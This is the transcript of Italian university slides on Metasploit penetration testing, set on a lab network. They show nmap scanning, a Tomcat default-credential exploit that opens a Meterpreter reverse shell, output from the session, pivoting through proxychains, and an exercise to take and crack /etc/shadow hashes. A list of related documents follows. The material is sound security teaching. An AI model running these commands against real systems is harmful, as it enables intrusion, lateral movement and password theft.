Penetration Testing. Metasploit

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Penetration Testing. Metasploit"

Transcript

1 Penetration Testing Metasploit Dipartimento di Informatica Via salaria Novembre 2011 Dott. Antonio Villani Dott. Nino Verde 1

2 Riferimenti Metasploit Unleashed - pdf scaricabile da: ploit%20unleashed.pdf 2

3 Metasploit Framework Il framework non e' un tool finalizzato alla realizzazione di attacchi per hacker ma un'interfaccia generale per testare e scrivere exploits. Un exploit è un codice che, sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o all'accesso del sistema cui viene applicato. 3

4 Metasploit Framework Piattaforma Open Source avanzata usata per sviluppare, testare e usare exploit code Disponibile per ogni sistema operativo Inizialmente sviluppato in Perl ora sviluppato in Ruby Architettura modulare, scriptabile... Moduli aggiuntivi Non richiede conoscenza di bug o scrittura di shellcode 4

5 Metasploit Framework Overview Metasploit permette di Ricercare nuove tecniche d'attacco Analizzare i metodi degli attaccanti Test di IDS/IPS Penetration Test 5

6 Exploits Piattaforme attaccabili: linux / macosx / solaris / windows / etc Exploits mirati alle applicazioni (Browsers, backup, ftp, etc ) Exploits remoti, ma privilege escalation possibile con meterpreter. Exploits organizzati attraverso path: /piattaforma/applicaozione/exploit (es: /windows/browser/ms06_001_wmf_setabortproc) 6

7 Metaexploits: evasione controlli IDS Codifica: spesso cambiare il payload di un exploit ne fa cambiare la signature NOP no operation Es: plugin ips_filter 7

8 Payload Il payload è il codice o il comando che vogliamo venga eseguito sull'host target Il Payload è spesso definito come shellcode. La definizione è imprecisa dato che un attacco non esegue necessariamente una shell, es: creazione nuovo utente, nuovo processo di controllo, rootkit, apertura socket di rete... 8

9 Interfacce Metasploit Framework Msfconsole: Console Interattiva Msfcli: linea di comando Msfpayload: permette di creare payload eseguibile Msfweb: Because everything has to have a web interface msfwx GUI: Graphical User Interfaces Msfapi: (in sviluppo) piattaforma di sviluppo modulare 9

10 Vediamolo in azione 10

11 Configurazione di Rete 11

12 Per iniziare... Userete putty (dalla vostra macchina windows) per connettervi via ssh alle macchina Kali User: root PSW: toor Cerchiamo di capire quanti host attivi ci sono sulla rete: $nmap /24 -n Per prima cosa faremo insieme una scansione delle porte aperte sulla prima macchina target $nmap n $sudo nmap -ss n SYN scan 12

13 Scansione delle vulnerabilità Dal risultato di nmap si capisce che ci sono moltissime porte aperte su questo host. Alcune anche anche sospette (IRC,telnet,etc.) Diamo un'occhiata con Nessus o OpenVas a possibili vulnerabilità Tra le tante vulnerabilità sembra che Tomcat abbia password di default, e metasploit ha un exploit per tale vulnerabilità che ci darà accesso da amministratore alla macchina Cercate gli exploit per tomcat e controllate le informazioni fornite dal framework metasploit (usate info o show options) Quale fa al caso nostro? 13

14 Usiamo ora Metasploit $msfconsole avvierà la console di metasploit Comandi utili: search VAR per eseguire una ricerca tra i moduli di metasploit use VAR per usare un particolare modulo. I moduli sono organizzati in una gerarchia ben definita info mostra delle informazioni sul modulo in uso show options mostra le opzioni da settare set VAR per impostare il valore di una variabile set payload VAR per impostare il payload Exploit lanciare l'exploit 14

15 Payload Ci sono tanti possibili payload. Ogni exploit ne supporta alcuni. Il payload va settato dopo aver scelto l'exploit da utilizzare. Meterpreter è uno dei payload più utili: È sostanzialmente una shell avanzata Diverse modalità di connessione: Bind tcp Reverse tcp Reverse http, etc.. 15

16 Exploit Tomcat on the first machine msf> use exploit/multi/http/tomcat_mgr_deploy SETTATE LE VARIE OPZIONI COME MOSTRATO DI SOTTO msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 8180 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name Automatic LANCIATE L'EXPLOIT msf exploit(tomcat_mgr_deploy) > exploit

17 Getting the meterpreter session msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on :4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6471 bytes as UA99glu9ybDXRwb7YtZ4.war... [*] Executing /UA99glu9ybDXRwb7YtZ4/Zvuq4YcK2m.jsp... [*] Undeploying UA99glu9ybDXRwb7YtZ4... [*] Sending stage (30355 bytes) to [*] Meterpreter session 6 opened ( :4444 -> :47873) at :57: meterpreter >

18 Check configuration rpreter > ifconfig Interface 1 ============ Name : lo - lo Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : ::1 IPv6 Netmask : :: Interface 2 ============ Name : eth1 - eth1 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8d0 IPv6 Netmask : :: Interface 3 ============ Name : eth0 - eth0 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8c6 IPv6 Netmask : :: Meterpreter > Background session 6? [y/n] msf exploit(tomcat_mgr_deploy) >

19 Considerazioni Sembra che l'host ha effettivamente un altra scheda di rete configurata con indirizzo IP appartenente ad un'altra sottorete Vogliamo allora fare una scansione in quella sottorete Faremo pivoting attraverso la macchina già compromessa. Per prima cosa dobbiamo aggiungere una rotta...

20 Configurazione di Rete postexploitation

21 Alcuni comandi utili Prima di aggiungere una rotta impariamo ad usare le sessioni meterpreter Per mandare in background una sessione meterpreter usare il comando background Da msfconsole, il comando sessions vi resituisce una lista delle sessioni in background attive Vedere sessions -h per help Per ritornare ad una sessione in background usare: sessione -i NUMEROSESSIONE

22 Il comando route Il comando route permette di aggiungere delle rotte alla tabella di routing usata da metasploit. Con questo comando possiamo raggiungere sottoreti visibili soltanto da altri host che abbiamo precedentemente attaccato Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local.

23 Aggiungere una rotta verso la rete interna Una volta che la sessione meterpreter è in background possiamo aggiungere la nuova rotta. msf exploit(tomcat_mgr_deploy) > route add [*] Route added msf exploit(tomcat_mgr_deploy) > route print Active Routing Table ==================== Subnet Netmask Gateway Session 6

24 Scansione della rete interna (1/2) msf exploit(tomcat_mgr_deploy) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS yes Ports to scan (e.g ,80, ) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds

25 Scansione della rete interna (2/2) msf auxiliary(tcp) > run [*] :25 - TCP OPEN [*] :21 - TCP OPEN [*] :22 - TCP OPEN [*] :23 - TCP OPEN [*] :53 - TCP OPEN [*] :80 - TCP OPEN [*] :111 - TCP OPEN [*] :139 - TCP OPEN [*] :445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >

26 Configurare un proxy per raggiungere la rete interna da altre applicazioni Ora che abbiamo una rotta verso il target configuriamo un proxy che può essere usato da altre applicazioni diverse da meterpreter Metasploit ha un modulo che ci permette di fare ciò: auxiliary/server/socks4a Questo modulo permette di creare un proxy che utilizza la funzionalità di routing interna a Metasploit per redirigere le connessioni.

27 auxiliary/server/socks4a msf auxiliary(tcp) > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description SRVHOST yes The address to listen on SRVPORT 1080 yes The port to listen on. msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) >

28 Proxychains Ora avremo un proxy in ascolto su localhost:1080 Dobbiamo configurare il tool che redirigerà verso tale proxy tutto il traffico: proxychains Modifichiamo /etc/proxychains.conf editando l'ultima riga, che diventerà: Socks proxychains nmap -st -n -PN L'opzione -PN evita l'utilizzo di pacchetti UDP non supportati da proxychain

29 Proviamo ad usare altri servizi proxychains ssh ProxyChains-3.1 ( S-chain -<> :1080-<><> :22-<><>-OK password:

30 Esercizio Continuare l'exploitation della seconda macchina Fare attenzione al payload di meterpreter utilizzato Spiegare perché java/meterpreter/reverse_tcp non può essere utilizzato Ci sono altri possibili target?

31 Esercizio PenTest Mandate una mail a verde@di.uniroma1.it per ricevere le istruzioni ed i file necessari alla configurazione di una rete VPN Una volta stabilita la connessione con la VPN otterrete un indirizzo nella sottorete /24 Il vostro primo target è la macchina Una volta compromesso quel target dovrete continuare il lavoro di post-exploitation e trovare altri host vulnerabili Obiettivo: recuperare il file /etc/passwd e /etc/shadow di tutte le macchine compromesse e provare a crackare le password

32 Regole Non barate... ci possiamo accorgere di come siete arrivati alla soluzione Non modificate le impostazioni di rete delle macchine compromesse (interfacce, indirizzi ip, etc.) Appena compromessa una qualsiasi macchina mandate una mail a verde@di.uniroma1.it Avrete tempo fino al 20 dicembre per terminare l'esercizio Entro quella data dovrete redigere un report delle attività svolte e delle vulnerabilità trovate ed exploitate Inserite quanti più dettagli possibili nel report

Hacker Frameworks & Risorse utili HACKER FRAMEWORKS

Hacker Frameworks & Risorse utili HACKER FRAMEWORKS Hacker Frameworks & Risorse utili HACKER FRAMEWORKS In questo modulo vedremo sia i software framework più utilizzati in ambito di penetration testing sia le risorse, come ad esempio siti internet dedicati,

Dettagli

Rootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab

Rootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab Pattern Recognition and Applications Lab Rootkit Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University

Dettagli

1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010

1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010 1 GARR Tutorial sulla sicurezza informatica R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010 Programma della giornata 17 18 19 novembre 2010 1 a parte: vulnerabilità e backdoor in MS Windows Pausa pranzo

Dettagli

Setup dell ambiente virtuale

Setup dell ambiente virtuale Setup dell ambiente virtuale 1.1 L immagine per le macchine virtuali Il file sicureti.iso è l immagine ISO di una distribuzione live di Linux (basata Debian Stretch, ottenuta con live-build, http://live.debian.net).

Dettagli

Introduzione a Linux Lezione 8 Gestione della rete

Introduzione a Linux Lezione 8 Gestione della rete Introduzione a Linux Lezione 8 Gestione della rete Angelo Genovese Corso di Sistemi Operativi I/II Prof. V. Piuri Università degli Studi di Milano Dipartimento di Informatica A.A. 2018/2019 2018 2015 Angelo

Dettagli

Sommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0

Sommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0 Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0 Sommario 1. PREMESSA... 2 2. INSTALLAZIONE SOFTWARE VPN CLIENT... 2 3. PRIMO AVVIO E CONFIGURAZIONE

Dettagli

ATTACCO DI UN SERVER LINUX

ATTACCO DI UN SERVER LINUX ATTACCO DI UN SERVER LINUX RECUPERO INFORMAZIONI NOTA: Le attività spiegate da qui in avanti vanno fatte solamente su macchine di cui siete proprietari. Tentativi di intrusione in sistemi informatici potrebbero

Dettagli

ULISSE LAB. CTF: How to improve your pentesting skills with HackTheBox

ULISSE LAB. CTF: How to improve your pentesting skills with HackTheBox ULISSE LAB CTF: How to improve your pentesting skills with HackTheBox Capture The Flag L obiettivo principale è quello di trovare un file specifico all interno di una macchina vulnerabile. Questo può essere

Dettagli

Installazione e Configurazione del servizio DHCP. Orazio Battaglia

Installazione e Configurazione del servizio DHCP. Orazio Battaglia Installazione e Configurazione del servizio Orazio Battaglia Protocollo e Servizio Il protocollo (Dynamic Host Configuration Protocol) è un protocollo di rete di livello applicativo che permette ai dispositivi

Dettagli

Se per esempio inserisco show version ecco il risultato. Con il comando enable entro in privilege mode.

Se per esempio inserisco show version ecco il risultato. Con il comando enable entro in privilege mode. Laboratorio 1 Packet Tracer Prendiamo un router ed un computer. Prendiamo un console cable e lo colleghiamo alla console port del router e alla porta RS 232 del PC. Clicchiamo sul PC e scegliamo il Terminal.

Dettagli

Guida introduttiva su Eclipse. Ing. Marco Dell'Unto marco.dellunto@iet.unipi.it

Guida introduttiva su Eclipse. Ing. Marco Dell'Unto marco.dellunto@iet.unipi.it Guida introduttiva su Eclipse Ing. Marco Dell'Unto marco.dellunto@iet.unipi.it Introduzione Eclipse è un ambiente di sviluppo (IDE) multilinguaggio e multipiattaforma scritto in Java. E Open Source. Può

Dettagli

Network Address Translation

Network Address Translation Network Address Translation 1 Concetti di NAT e assegnazione IP pubblici L indirizzamento IP finora utilizzato è quello associato al protocollo IPv4. Ciascun indirizzo IPv4 è composto da 32 bit, quindi

Dettagli

Bucare WindowsXP SP2 con Metasploit

Bucare WindowsXP SP2 con Metasploit Bucare WindowsXP SP2 con Metasploit Vulnerabilità ms08_067_netapi Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più sicuro, vista l'introduzione di numerosi bugfix

Dettagli

Aggiornamenti e Client Side Exploitation

Aggiornamenti e Client Side Exploitation ICT Security Magazine ICT Security - La Prima Rivista Dedicata alla Sicurezza Informatica https://www.ictsecuritymagazine.com Aggiornamenti e Client Side Exploitation Author : Milo Caranti Date : 5 settembre

Dettagli

Sommario. Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce. impostazioni: comandi ifup e ifdown

Sommario. Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce. impostazioni: comandi ifup e ifdown Seconda Esercitazione Sommario Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce attivazione (up) disattivazione (down) impostazioni: indirizzo IP maschera di rete (netmask)

Dettagli

02/10/2015 SISTEMI E RETI. Router Cisco. Parte 2 - IOS. A cura dell Ing. Claudio Traini. router. sottoreti. terminali

02/10/2015 SISTEMI E RETI. Router Cisco. Parte 2 - IOS. A cura dell Ing. Claudio Traini. router. sottoreti. terminali SISTEMI E RETI Router Cisco Parte 2 - IOS A cura dell Ing. Claudio Traini sottoreti router terminali 1 Livelli di accesso ai comandi Un router ha due livelli di accesso ai comandi User EXEC mode Privileged

Dettagli

HACKING LAB. con ProxMox e Metasploitable. Andrea Draghetti - 23 Maggio FabLab Bassa Romagna

HACKING LAB. con ProxMox e Metasploitable. Andrea Draghetti - 23 Maggio FabLab Bassa Romagna HACKING LAB con ProxMox e Metasploitable $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta

Dettagli

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 7 Configurazione del firewall 2 Programma

Dettagli

L Inoltro e l Instradamento

L Inoltro e l Instradamento Politecnico di Milano Advanced Network Technologies Laboratory L Inoltro e l Instradamento - Inoltro diretto e indiretto negli host - Inoltro diretto e indiretto nei router - Tabelle di routing - Esempi

Dettagli

Protocollo ARP IP forwarding

Protocollo ARP IP forwarding Protocollo ARP IP forwarding A.A. 2018/2019 Walter Cerroni Reti IP come insiemi di indirizzi Una rete IP è individuata dall indirizzo di rete, che è quello con i bit dell Host-ID tutti a zero (in genere

Dettagli

Sistema operativo. Avere un architettura multi-core è un vantaggio

Sistema operativo. Avere un architettura multi-core è un vantaggio Sistema operativo Software responsabile del controllo e della gestione dei componenti hardware di un computer mediante interfaccia (driver), e della gestione dei vari programmi del computer. I programmi

Dettagli

Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni:

Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni: Connessione LAN Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni: 1) Alimentare la basestation MWDG-ETH 2) Connettere cavo ethernet tra basestation

Dettagli

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 2 Configurazione di interfacce di rete,

Dettagli

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018. Ing. Carlo Vallati

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018. Ing. Carlo Vallati Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018 Ing. Carlo Vallati carlo.vallati@unipi.it 1 Esercitazione 2 Configurazione di interfacce di rete, gateway

Dettagli

Antonio Cianfrani. L emulatore Packet Tracer A.A. 2015/2016

Antonio Cianfrani. L emulatore Packet Tracer A.A. 2015/2016 Antonio Cianfrani L emulatore Packet Tracer A.A. 2015/2016 Packet Tracer (1/2) Che cosa è Packet Tracer? Cisco Packet Tracer è un software didattico per l emulazione di apparati di rete CISCO A cosa serve

Dettagli

Le slides sono all indirizzo: slides.poul.org/2018/corsi-linux-avanzati/ansible

Le slides sono all indirizzo: slides.poul.org/2018/corsi-linux-avanzati/ansible Ansible or: How I learned to stop worrying and love the configuration manager 1 Slides? Le slides sono all indirizzo: slides.poul.org/2018/corsi-linux-avanzati/ansible 2 Ansible: What is that? 3. 1 Ansible

Dettagli

AI 464 ETH NEW Gestione della scheda Eureka IP Interface (AI4164ETH NEW) Ottobre 2018

AI 464 ETH NEW Gestione della scheda Eureka IP Interface (AI4164ETH NEW) Ottobre 2018 AI 464 ETH NEW Gestione della scheda Eureka IP Interfacee (AI4164ETH NEW) Ottobre 2018 INDICE INTRODUZIONE ACCESSO ALLA INTERFACCIA AI4164ETH NEW VIA WEB CONFIGURARE LE IMPOSTAZIONI GENERALI CONFIGURARE

Dettagli

Moduli Bluetooth 03 - connessione seriale via BT

Moduli Bluetooth 03 - connessione seriale via BT Moduli Bluetooth 03 - connessione seriale via BT v 0.1 - Author: Mirco Piccin aka pitusso La connessione seriale ai moduli BT permette di inviare dati dal pc/smartphone/altro ad Arduino, in modalita wireless.

Dettagli

Reti di Comunicazione e Internet

Reti di Comunicazione e Internet Politecnico di Milano Dipartimento di Elettronica e Informazione Reti di Comunicazione e Internet Laboratorio 2. Packet Tracer Agenda della lezione CISCO IOS Command Line Interface: User Exec Mode Privileged

Dettagli

NAT: Network Address Translation

NAT: Network Address Translation NAT: Network Address Translation Prima di tutto bisogna definire che cosa si sta cercando di realizzare con NAT 1. Stai cercando di consentire agli utenti interni di accedere a Internet? 2. Stai cercando

Dettagli

Relazione su METASPLOIT FRAMEWORK

Relazione su METASPLOIT FRAMEWORK Università degli Studi di Catania Corso di Laurea Specialistica in Ingegneria Informatica Sicurezza nei Sistemi Informativi Docente prof. O. Tomarchio Relazione su METASPLOIT FRAMEWORK Studenti Coco Ignazio

Dettagli

Chi sono. Metasploit Framework - Net&System Security - Pisa, 27 Novembre 2007 - Matteo Falsetti

Chi sono. Metasploit Framework - Net&System Security - Pisa, 27 Novembre 2007 - Matteo Falsetti Chi sono ricercatore indipendente da dieci anni da sei mi occupo di penetration testing e vulnerability assessment non faccio parte del team di sviluppo di Metasploit Metasploit Framework - Net&System

Dettagli

L'ambiente DB2 in LAB (e come collegarsi da remoto)

L'ambiente DB2 in LAB (e come collegarsi da remoto) L'ambiente DB2 in LAB (e come collegarsi da remoto) Sistemi Informativi T Versione elettronica: L00.DB2inLAB.pdf Il server IBM DB2 Il server DB2, edizione Express-C, è installato su una macchina Linux

Dettagli

Seconda Prova in itinere Esempio

Seconda Prova in itinere Esempio Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare

Dettagli

DOMANDA 1: Qual è il più piccolo blocco di indirizzi che servirebbe a questa rete? Rete1P R4 H

DOMANDA 1: Qual è il più piccolo blocco di indirizzi che servirebbe a questa rete? Rete1P R4 H Esercizio Subnetting, Routing e configurazione macchine Linux Considerando la topologia di rete rappresentata in figura, ed avendo a disposizione lo spazio di indirizzi 79.0.192.0/18, ricavare utilizzando

Dettagli

Proteggere la rete I FIREWALL (seconda parte)

Proteggere la rete I FIREWALL (seconda parte) Proteggere la rete I FIREWALL (seconda parte) Index Architetture di rete con Firewall A cosa serve il NAT Cosa sono gli Intrusion Detection System Esistono molte architetture possibili per inserire un

Dettagli

LABORATORIO DI SISTEMI OPERATIVI

LABORATORIO DI SISTEMI OPERATIVI LABORATORIO DI SISTEMI OPERATIVI Corso di Laurea Triennale in Ingegneria Informatica A.A. 2018/2019 Guglielmo Cola Email: g.cola@iet.unipi.it Web: iet.unipi.it/g.cola Esercitazione 3 Gestione utenti (seconda

Dettagli

Esercitazione di Reti di Calcolatori Installazione Del Software https://www.netacad.com/courses/packet-tracer Sign in > Resources > Download Packet Tracer Packet Tracer Interface Ecco l interfaccia principale

Dettagli

Esercitazione su routing IP con OSPF

Esercitazione su routing IP con OSPF Reti di Calcolatori I Esercitazione su routing IP con OSPF Prof. Roberto Canonico Dipartimento di Ingegneria Elettrica e delle Tecnologie dell Informazione Corso di Laurea in Ingegneria delle Telecomunicazioni

Dettagli

Analisi del Traffico di Rete

Analisi del Traffico di Rete Analisi del Traffico di Rete L. Massari, G. Nebbione giuseppe.nebbione01@universitadipavia.it University of Pavia Anno Accademico 2018/2019 1 / 30 Outline 1 Introduzione all analisi dei pacchetti 2 Pillole

Dettagli

Reti e Sicurezza Informatica Esercitazione 5

Reti e Sicurezza Informatica Esercitazione 5 Corso di Laurea in Informatica Reti e Sicurezza Informatica Esercitazione 5 Prof. Mario Cannataro Ing. Giuseppe Pirrò Le fasi di un attacco informatico Footprinting Scansione Enumerazione Exploit Controllo

Dettagli

Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi

Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi Teleassistenza Serie FX Serie Q ewon Mod. FA_STM_00 Data: 07.03.2013 Pag. 1/31 STM33.doc Rev. 01 Preparato da: Verificato da: Firme Massimiliano

Dettagli

INFOCOM Dept. Il routing

INFOCOM Dept. Il routing Il routing Funzione di instradamento nei Router IP I Router IP hanno la funzione di instradare i datagrammi in rete: ricevono un datagramma da una interfaccia, eseguono alcune operazioni e rilanciano il

Dettagli

Internet Protocol Versione 4: instradamento e routing. Aspetti di forwarding e routing del protocollo IPv4

Internet Protocol Versione 4: instradamento e routing. Aspetti di forwarding e routing del protocollo IPv4 Internet Protocol Versione 4: instradamento e routing Aspetti di forwarding e routing del protocollo IPv4 1 Instradamento (forwarding) Operazione comune a tutte le macchine con stack TCP/IP Router, end

Dettagli

Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE

Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE Di cosa abbiamo bisogno? 1 Virtual-Box 2 Una ISO di Linux 3 Una connessione ad internet Iniziamo Per prima cosa avviamo Virtual-Box, dopo

Dettagli

Antonio Cianfrani. Standard Access Control List (ACL)

Antonio Cianfrani. Standard Access Control List (ACL) Antonio Cianfrani Standard Access Control List (ACL) Indice Cosa sono le ACL? Interfacce Inbound & Outbound Wildcard mask Configurare una ACL standard ACL extended (prossima lezione) Named ACL (prossima

Dettagli

Introduzione ad hping

Introduzione ad hping Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione ad hping Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione ad hping

Dettagli

Riassunto della rete virtuale

Riassunto della rete virtuale Riassunto della rete virtuale 1.1 La rete di Qemu Figura 1.1: La rete virtuale creata da Qemu in modalità user networking Qemu implementa una rete virtuale minimale con la topologia descritta nella figura

Dettagli

Esercitazione di Reti di Calcolatori Installazione Del Software https://www.netacad.com/courses/packet-tracer Sign in > Resources > Download Packet Tracer Packet Tracer Interface Ecco l interfaccia principale

Dettagli

Routing IP A.A. 2006/2007. Walter Cerroni. Routing gerarchico in Internet

Routing IP A.A. 2006/2007. Walter Cerroni. Routing gerarchico in Internet Routing IP A.A. 2006/2007 Walter Cerroni Routing gerarchico in Internet Dal punto di vista del routing, Internet è suddivisa in modo gerarchico in Autonomous System (AS) un AS è un gruppo connesso di una

Dettagli

4.2 Collegamento con Mozilla Firefox o Google Chrome 5 Tool di configurazione rapida (Config Tool) Presentazione 5.2 Ricerca / Connessione

4.2 Collegamento con Mozilla Firefox o Google Chrome 5 Tool di configurazione rapida (Config Tool) Presentazione 5.2 Ricerca / Connessione IT EN. 1 Presentazione generale... 4 1.1 Accessori 1.2 Specifiche 1.3 Configurazione predefinita della rete 2 Struttura... 7 2.1 Dimensioni 2.2 Sistema 3 Installazione... 9 3.1 Installazione dell'apparecchio

Dettagli

Seconda Prova in itinere Esempio

Seconda Prova in itinere Esempio Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare

Dettagli

Ingegneria del Software 1: Eclipse

Ingegneria del Software 1: Eclipse Ingegneria del Software 1: Eclipse Da completare entro Marzo 15, 2016 S. Krstić and M. Scavuzzo and F. Marconi and A. Rizzi and C. Menghi 1 Contents 1 Introduzione 3 1.1 Java (JRE vs JDK)..........................................

Dettagli

Guida Tecnica. Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico.

Guida Tecnica. Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico. Guida Tecnica Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico. Se abbiamo la necessità di visionare da remoto un DVR, è opportuno configurare

Dettagli

Active Discovery TOOLS: CHI PIÙ NE HA PIÙ NE METTA

Active Discovery TOOLS: CHI PIÙ NE HA PIÙ NE METTA Active Discovery TOOLS: CHI PIÙ NE HA PIÙ NE METTA TOOLS Nmap è sicuramente un punto di riferimento per la fase dell Active Discovery, grazie al quale possiamo fare dell information gathering e dell enumeration

Dettagli

Antonio Cianfrani. Dynamic Host Configuration Protocol (DHCP)

Antonio Cianfrani. Dynamic Host Configuration Protocol (DHCP) Antonio Cianfrani Dynamic Host Configuration Protocol (DHCP) Il protocollo DHCP Il protocollo DHCP consente ad un router di configurare dinamicamente gli host all interno di una LAN. Parametri da configurare:

Dettagli

Cloud Hik-Connect. Guida rapida per registrare un dispositivo su Hik-Connect

Cloud Hik-Connect. Guida rapida per registrare un dispositivo su Hik-Connect Cloud Hik-Connect Guida rapida per registrare un dispositivo su Hik-Connect Indice 1. Come registrare account Hik-Connect... 3 a. Registrazione tramite APP Hik-Connect... 3 b. Registrazione tramite web

Dettagli

Cosa è importante: pom.xml Goal Plug-in Repository

Cosa è importante: pom.xml Goal Plug-in Repository Cos è Maven? Maven è un software usato principalmente per la gestione di progetti Java e build automation, ma è utile anche per gestire documentazione, report, dipendenze... Cosa è importante: pom.xml

Dettagli

Corso sul linguaggio SQL

Corso sul linguaggio SQL Corso sul linguaggio SQL Modulo L2B (SQL) 1 - Introduzione 1 Prerequisiti Aver installato mysql o EasyPHP Database e tabelle Struttura di una tabella 2 1 Introduzione In questa Unità descriviamo i primi

Dettagli

Penetration Testing Aziendale con BeEF

Penetration Testing Aziendale con BeEF Penetration Testing Aziendale con BeEF Giovanni Cattani Giovanni Cattani Security Specialist @ Secure Network S.r.l. #penetrationtest #vulnerabilityassessment #web #mobile #network #riskassessment BeEF

Dettagli

Antonio Cianfrani. Configurazione di un Router CISCO A.A. 2015/2016

Antonio Cianfrani. Configurazione di un Router CISCO A.A. 2015/2016 Antonio Cianfrani Configurazione di un Router CISCO A.A. 2015/2016 IOS Un router o uno switch non possono funzionare senza sistema operativo Studieremo il sistema operativo della Cisco: Cisco IOS L IOS

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere

Dettagli

Seconda Esercitazione

Seconda Esercitazione Seconda Esercitazione Sommario Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce attivazione (up) disattivazione (down) impostazioni: indirizzo IP maschera di rete (netmask)

Dettagli

